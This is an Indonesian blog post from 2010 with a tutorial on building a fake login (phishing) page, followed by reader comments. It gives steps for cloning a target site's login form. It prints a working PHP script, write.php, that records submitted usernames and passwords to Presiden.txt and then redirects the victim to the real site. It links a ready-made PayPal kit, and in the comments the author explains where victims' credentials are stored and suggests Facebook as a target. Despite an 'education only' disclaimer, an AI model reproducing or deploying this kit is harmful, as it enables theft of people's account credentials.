Twitter

Cara Membuat Fake Login

Diposting oleh Touya Blog on

Maros- Dari Judulnya kita Bisa tau kalau trick kali ini adalah trick yang sudah sangat basi, tapi kenapa saya tetap menuliskan tutorial sesuai judul? tidak lain dan tidak bukan, karena saya yakin, masih ada yang belum tau cara membuat Fake Login yang tidak begitu sulit, selain itu ada beberapa teman yang selalu meminta di buatkan fake Login, selain itu lagi, saya juga sudah malas membuat Fake login request orang bukan karena pelit, tapi saya juga ada kesibukan di Dunia Nyata, jadi lebih baik saya membuat Artikel ini saja di Blog saya. jadi yang sudah tau tidak usah baca yah...!!!


Apa itu Fake Login?
Fake Login itu adalah halaman login palsu yang di buat para Phiser untuk melakukan phishing pada korbannya untuk mendapatkan user dan passwordnya, mungkin teman-teman hanya ambil file yang sudah jadi dari orang lain tanpa tau bagaimana sebenarnya cara membuatnya, sebenarnya sangatlah mudah dan simple.
wokeh, saya jelaskan caranya di bawah ini :



1. Hanya bermodalkan masuk ke halaman login website target (tapi tidak login).
2. Klick Kanan pada Page login Tersebut, dan pilih View Page Source.
3. tekan CTRL+A untuk melakukan Seleksi pada semua Source.
4. Pastekan ke Notepad atau PHP Editor, misal Rapid PHP, Driemweaver, dll.
5. dan silahkan Save dengan nama index.php
6. sebelum di Save, periksa perintah ini : <form method="Post" action="write.php"
7. tulisan Post di ganti jadi Get.



nah, tidak sampai di situ, bagaimana cara agar kita bisa melakukan pencurian user dan passwordnya? tentu harus membuat file php yang di sinkronkan dengan file index.php tadi dengan cara, buka software php editor atau notepad dan ketikkan Perintah ini.

<?php
header("Location:https://www.target.com/");
$handle = fopen("Presiden.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>    


Script di atas di save dengan nama file write.php kawan... dan selamat berkarya.



Ini salah satu Contohnya :
http://anggraini.widjanarti.com/paypal.zip








Just Education, penulis tidak bertanggung jawab atas apa pembaca lakukan yang bersumber dari Blog saya, karena Tulisan saya di tujukan untuk edukasi.

Diposting oleh Touya Blog on Kamis, 10 Juni 2010

{ 6 komentar... read them below or add one }

Aditya mengatakan...

bang NIe Di save namenya paan
$value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
plIZZ jwab

Touya Blog mengatakan...

wow... maaf, lupa masukin.... itu nama file nya write.php mas.... heheheheee.... entar gw edit dah...!!!

goqilokhy mengatakan...

Gan ane dri dlu bingung nyari perintah yg mo d rubah dri "Post" mnjdi "Get" soal'a nyari gk bsa pke find y mata ane jd jereng...
trus klo mo liat hsil korban dmn gan??

Touya Blog mengatakan...

di File Write PHP kan ada perintah ini =
$handle = fopen("Presiden.txt", "a");

nah itu nanti otomatis membuat File namanya presiden.txt pada Folder yang sama yang isinya Email dan password korban...

Ari Setiawan mengatakan...

bang kalo source yg ini di ganti dengan apa ??
header("Location:https://www.target.com/");

yang saya tanya adalah www.target.com
di ganti dengan apa ??
apakah dengan nama website aslinya ??

Touya Blog mengatakan...

Arhy Van Setiawan @ itu di sis dengan nama web yang kita mau Alihkan, misal kita mau buat fake login Facebook, di situ alamat web www.facebook.com biar nanti abis login, di alihkan ke halaman itu...